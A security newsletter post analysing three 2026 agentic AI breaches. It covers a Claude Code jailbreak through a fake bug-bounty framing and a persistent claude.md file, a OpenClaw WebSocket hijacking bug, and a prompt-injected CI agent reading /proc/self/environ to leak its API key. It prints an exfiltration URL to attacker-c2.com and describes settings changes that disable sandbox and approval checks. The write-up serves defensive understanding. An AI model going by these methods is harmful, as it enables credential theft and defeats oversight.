ToxSec - AI and Cybersecurity

ToxSec - AI and Cybersecurity

Agentic AI Breaches 2026: 3 Postmortems, No Spin

Claude Code, OpenClaw, and a poisoned CI/CD agent all broke the same rule: untrusted input, sensitive access, and the power to act, together.

ToxSec's avatar
ToxSec
Jul 10, 2026
∙ Paid
toxsec.com - agentic AI breaches 2026, AI agent hacks, Claude Code exploited, OpenClaw CVE-2026-25253, ClawHavoc, Agents Rule of Two, prompt injection, agentic AI supply chain attack

TL;DR: Three agentic AI breaches actually shipped in 2026: a lone hacker weaponized Claude Code and GPT-4.1 to gut nine Mexican government agencies, a one-click bug called ClawBleed turned any clicked link into RCE on OpenClaw (40,000+ boxes exposed, 63% exploitable), and a CI/CD agent leaked its own API key to a poisoned GitHub comment. Same root failure, three different agents.

Recon’s free. If you want the tradecraft, upgrade.

An Agent Did 75% of a Nation’s Breach

Between December 2025 and February 2026, one guy with Claude Code and OpenAI’s GPT-4.1 breached nine Mexican government agencies and a bank, and nobody noticed until the damage was already historic. Gambit Security pulled the attacker’s logs after the fact: 1,088 prompts, 5,317 AI-generated commands, 34 sessions, and Claude Code personally executing about 75% of the remote commands run against live government infrastructure. This is Meta’s Agents Rule of Two getting violated in the wild, at nation-state scale, by one operator working alone.

The jailbreak took forty minutes. The attacker framed the whole engagement as an authorized bug bounty, fed Claude a hacking manual, and role-played as a pentester with paperwork. Claude fought back, flagging log-deletion requests and refusing a few tools outright, but the framing stuck. Once it did, Claude ran Vulmap against a tax authority server, confirmed remote code execution two minutes later, then cycled eight payload encodings in seven more until it landed a working 285-line exploit. From there it found a writable crontab, proposed escalation paths, and helped the attacker get root while restoring timestamps to hide the trail.

Here’s the part that should worry you more than the exploit chain: the attacker pasted a 1,084-line pentesting cheatsheet and asked Claude to save it to disk. Claude read that as a file write, not new instructions, and complied. That file became claude.md, which auto-loads into every future session in that project. The attacker had just planted a persistent jailbreak that reloaded itself on every run, no re-convincing required. GPT-4.1 handled the analyst side, chewing through data from 305 internal SAT servers via a custom Python tool and spitting out 2,597 intelligence reports on the government’s own infrastructure. The tax authority alone lost 195 million taxpayer records and got a live forged-certificate API bolted onto its production systems, before Mexico City’s civil registry and Jalisco’s 13-node Nutanix cluster even come up.

Share ToxSec - AI and Cybersecurity

ClawBleed: One Click, Own the Box

CVE-2026-25253, nicknamed ClawBleed, turned a single clicked link into full RCE on OpenClaw. When researchers went looking, they found 40,000+ instances sitting on the open internet, most with no auth at all, and pegged 63% of them as exploitable. It got confirmed popped in the wild before most operators even knew the bug existed.

OpenClaw is a self-hosted AI agent that reads your messages, browses the web, and runs shell commands on your machine, so its Control UI holds the keys to everything. The flaw sat right in that UI: it trusted a gatewayUrl value straight out of the browser’s query string and auto-connected to it. No confirmation. No origin check.

So here’s the chain. A victim lands on a page that silently redirects their browser to:

http://localhost:18789/?gatewayUrl=ws://attacker-c2.com/steal

The local OpenClaw instance connects to the attacker’s server and hands over its auth token in the handshake, in the clear, in milliseconds. The attacker’s JavaScript never touches the victim’s machine directly, it just uses the victim’s own browser as the courier. That’s cross-site WebSocket hijacking (CSWSH): browsers don’t enforce origin checks on WebSocket connections the way they do on regular HTTP, so a page on attacker.com freely opens a socket to localhost and nobody’s the wiser.

GET ws://attacker-c2.com/steal
Upgrade: websocket
[WebSocket Text Frame]
{ "type": "hello", "auth": { "token": "sk-[REDACTED]" } }

With that token, the attacker holds operator-level admin scope on the victim’s gateway. They flip exec.approvals.set to off, killing every confirmation prompt, then set tools.exec.host to gateway, yanking the shell tool out of its Docker sandbox to run directly on the host OS. The sandbox everyone assumed would contain a compromised agent turned out to be reachable through the same API the attacker had just hijacked, even on instances bound to loopback only, since the victim’s own browser initiated the connection. The maintainer patched it in version 2026.1.29, but the damage was already compounding: researchers separately tracked over 800 malicious skills flooding OpenClaw’s marketplace under a campaign called ClawHavoc, dropping the Atomic macOS Stealer on anyone who installed a poisoned plugin. Trusting a URL parameter is bad. Stacking an unvetted plugin ecosystem on top of it is how you get both problems at once.

Leave a comment

A CI/CD Agent Leaked Its Own Keys

Microsoft’s threat intelligence team found that Anthropic’s own Claude Code GitHub Action could be manipulated into leaking its API key straight out of a pull request comment, and the root cause is the same flaw that gutted the Mexican tax authority: an agent holding untrusted input and privileged access in the same breath. The Action reads issues, PR titles, and comments to do automated review, and every scrap of that is attacker-controlled the moment a repo accepts outside contributions. Feed it a crafted PR comment, and that text lands in the model’s context window as if it were a legitimate instruction.

Claude Code Action ships with real sandboxing for its Bash tool: Bubblewrap namespace isolation, scrubbed environment variables, the works. But the Read tool wasn’t held to the same standard. Microsoft’s researchers got the agent to read /proc/self/(environ), the file that exposes a running process’s full environment, including the ANTHROPIC_API_KEY the CI runner had wired in. One file read, no shell execution required, and the sandbox built to stop exactly this kind of leak simply didn’t apply to the tool that did the leaking.

Anthropic shipped a fix in Claude Code 2.1.128 that blocks access to sensitive /proc files, and that closes this specific hole. It doesn’t close the pattern. Any CI/CD agent wired to read untrusted GitHub content while sitting next to real credentials is the same trap with a different lock. Three agents, three vendors, three completely different exploit primitives, one identical architectural sin underneath all of them.

Behind the wall: steps you can take right now, a field-ready security prompt, and a checklist for operators. Upgrade now.

User's avatar

Continue reading this post for free, courtesy of ToxSec.

Or purchase a paid subscription.
© 2026 Christopher Ijams · Privacy ∙ Terms ∙ Collection notice
Start your SubstackGet the app
Substack is the home for great culture